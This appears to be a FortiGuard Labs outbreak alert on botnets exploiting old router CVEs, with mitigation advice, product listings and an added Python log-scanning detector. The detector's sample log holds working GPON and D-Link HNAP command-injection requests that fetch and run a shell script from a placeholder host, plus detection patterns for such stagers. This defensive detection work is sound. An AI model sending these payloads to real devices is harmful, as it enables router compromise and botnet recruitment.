Router Malware Attack
Highly targeted router vulnerabilities
FortiGuard Labs has observed various router vulnerabilities being exploited in the wild to distribute malware such as MooBot, Lucifer, the BotenaGo botnet, Zerobot and Enemybot.
Common Vulnerabilities and Exposures
CVE-2023-26801
CVE-2023-26802
CVE-2023-27076
CVE-2019-10891
CVE-2018-10562
CVE-2018-10561
CVE-2015-2051
Background
Dec 06, 2021: FortiGuard Labs posted a blog about MooBot Malware, analyzing how MooBot targets a Hikvision camera vulnerability.
Jan 27, 2022: FortiGuard Labs released a Threat Signal on BotenaGo Malware, which targets multiple IoT devices.
April 12, 2022: FortiGuard Labs posted a blog about Enemybot Malware and how it targets various router vulnerabilities (Netgear, D-Link, etc.).
Dec 27, 2022: FortiGuard Labs released an Outbreak Alert about Zerobot Malware, which spreads primarily through IoT and web application vulnerabilities.
See the Additional Resources section for links to the blog posts, Threat Signal and Outbreak Alert mentioned above.
Threat Radar Overall Score: 4.4
CVSS Rating: 9.0
FortiRecon Score: 92/100
Known Exploited: Yes
Exploit Prediction Score: 97.42%
FortiGuard Telemetry: 80386
Latest Development
Recent news and incidents related to cybersecurity threats encompassing various events such as data breaches, cyber-attacks, security incidents, and vulnerabilities discovered.
In January 2023: FortiGuard Labs observed severe IPS detections (a peak of up to 50,000 unique IPS devices) and associated malware activity exploiting older router vulnerabilities. In particular, MooBot and Enemybot were targeting D-Link routers (CVE-2015-2051), while Lucifer, the BotenaGo botnet and Zerobot were exploiting vulnerabilities in unpatched Dasan GPON home routers (CVE-2018-10562, CVE-2018-10561).
FortiGuard Labs recommends upgrading vulnerable routers to the latest firmware and discontinuing the use of end-of-life products if they are still in service. FortiGuard Labs has already released multiple IPS and AV protections to block such attack attempts for our customers.
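For teams that cannot rely on an inline IPS in front of every home router, the same activity can be spotted in web-server or reverse-proxy logs from the devices themselves. The following is an added example, not Fortinet's IPS signature logic or code from this page: it parses constructed JSON-per-line request logs (source IPs, payload host and log format are all made up here) and flags the publicly documented request shapes for the CVEs named above, namely the `?images/` authentication bypass (CVE-2018-10561) and `dest_host` command injection in `/GponForm/diag_Form` (CVE-2018-10562) on Dasan GPON routers, and shell metacharacters in the HNAP `SOAPAction` header on D-Link routers (CVE-2015-2051), plus a generic download-and-execute heuristic that catches the stager most router botnets drop. The page itself does not describe these request patterns; they come from the public advisories for those CVEs.

```python
"""Added example: flag router-exploit request patterns in constructed JSON request logs."""
import json
import re
from urllib.parse import unquote_plus, urlsplit

# Shell metacharacters that have no business inside a router form field or SOAP header.
SHELL_META = re.compile(r"[`;|]|\$\(|&&")
# Typical botnet stager: fetch a script/binary, then chmod/exec it.
STAGER = re.compile(r"\b(wget|curl|tftp)\b.*\b(chmod|sh|busybox)\b", re.IGNORECASE)

# Constructed sample log (JSON per line). Addresses are from documentation ranges.
SAMPLE_LOG = r'''
{"src":"198.51.100.7","method":"POST","uri":"/GponForm/diag_Form?images/","headers":{"User-Agent":"Hello, world"},"body":"XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox wget http://203.0.113.5/x.sh -O /tmp/x;sh /tmp/x`;&ipv=0"}
{"src":"198.51.100.9","method":"POST","uri":"/HNAP1/","headers":{"SOAPAction":"\"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp;wget http://203.0.113.5/d.sh;chmod 777 d.sh;./d.sh`\""},"body":""}
{"src":"192.0.2.20","method":"POST","uri":"/GponForm/diag_Form","headers":{},"body":"XWebPageName=diag&diag_action=ping&dest_host=8.8.8.8&ipv=0"}
{"src":"192.0.2.21","method":"GET","uri":"/images/logo.png","headers":{},"body":""}
'''


def _params(event):
    """Merge query-string and form-body parameters into {name: [values]}.

    Splits on '&' only, so a ';' inside an injected command stays in the value
    (older urllib.parse_qs versions would split on ';' as well).
    """
    merged = {}
    query = urlsplit(event.get("uri", "")).query
    for chunk in (query, event.get("body", "")):
        for pair in chunk.split("&"):
            if not pair:
                continue
            key, _, value = pair.partition("=")
            merged.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return merged


def analyse(event):
    """Return the (rule, cve) pairs a single request event triggers."""
    hits = []
    uri = event.get("uri", "")
    path = urlsplit(uri).path
    params = _params(event)
    headers = {k.lower(): str(v) for k, v in event.get("headers", {}).items()}

    # CVE-2018-10561: a "?images/" suffix makes the GPON web server skip its login check.
    if "?images/" in uri:
        hits.append(("gpon_auth_bypass", "CVE-2018-10561"))

    # CVE-2018-10562: dest_host in the ping diagnostics form is passed to a shell.
    if path.startswith("/GponForm/diag_Form"):
        if any(SHELL_META.search(v) for v in params.get("dest_host", [])):
            hits.append(("gpon_cmd_injection", "CVE-2018-10562"))

    # CVE-2015-2051: D-Link HNAP builds a command from the SOAPAction header.
    soap = headers.get("soapaction", "")
    if path.startswith("/HNAP1") and "purenetworks.com/HNAP1" in soap and SHELL_META.search(soap):
        hits.append(("hnap_soapaction_injection", "CVE-2015-2051"))

    # Generic heuristic: download-and-execute chain anywhere in parameters or headers.
    blob = " ".join(v for vs in params.values() for v in vs) + " " + " ".join(headers.values())
    if STAGER.search(blob):
        hits.append(("stager_download_exec", None))
    return hits


def scan(lines):
    """Parse JSON log lines and return findings as (src, rule, cve) tuples."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        event = json.loads(line)
        for rule, cve in analyse(event):
            findings.append((event.get("src"), rule, cve))
    return findings


if __name__ == "__main__":
    for src, rule, cve in scan(SAMPLE_LOG.splitlines()):
        print(f"{src:15} {rule:28} {cve or '-'}")
```

The benign diagnostics ping and the ordinary `/images/` asset request produce no findings, which is the check worth keeping when tuning: `?images/` is only interesting when it appears as a query string appended to another path, and `dest_host` is only interesting when it carries metacharacters rather than a host.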
In June 2023: FortiGuard observed up to 18,000+ IPS devices blocking attack attempts against some Zyxel CPE models. Zyxel has released firmware updates for RCE and DoS vulnerabilities that had no assigned CVE numbers at the time of writing: https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-remote-code-execution-and-denial-of-service-vulnerabilities-of-cpe
FortiGuard Labs also observed attackers targeting CVE-2023-26801, a vulnerability affecting LB-LINK devices, with IPS detections on up to 5,000+ devices.
With the popularity of Work from Anywhere, a company's employees can be compromised easily if they use vulnerable home routers. Fortinet Zero Trust Access solutions provide continuous verification of all users and devices and check device posture as they access corporate applications and data. https://www.fortinet.com/solutions/enterprise-midsize-business/network-access/application-access
FortiGuard Cybersecurity Framework
Mitigate security threats and vulnerabilities by leveraging the range of FortiGuard Services.
- AV: Detects and blocks malware related to Router Malware Attack.
- AV (Pre-filter): Detects and blocks malware related to Router Malware Attack.
- IPS: Detects and blocks attack attempts related to router vulnerabilities (CVE-2019-10891, CVE-2018-10562, CVE-2018-10561, CVE-2015-2051).
- Outbreak Detection
- Threat Hunting
- Content Update
- Automated Response: Services that can automatically respond to this outbreak.
- FortiClient Forensics
- Assisted Response Services: Experts to assist you with analysis, containment and response activities.
- InfoSec Services: Security readiness and awareness training for SOC teams, InfoSec and general employees.
- Attack Surface Monitoring (Inside & Outside): Security reconnaissance and penetration testing services, covering both internal & external attack vectors, including those introduced internally via the software supply chain.
Threat Intelligence
Information gathered from analyzing ongoing cybersecurity events including threat actors, their tactics, techniques, and procedures (TTPs), indicators of compromise (IOCs), malware and related vulnerabilities.
Indicators of compromise
Mitre Matrix
References
Sources of information in support and relation to this Outbreak and vendor.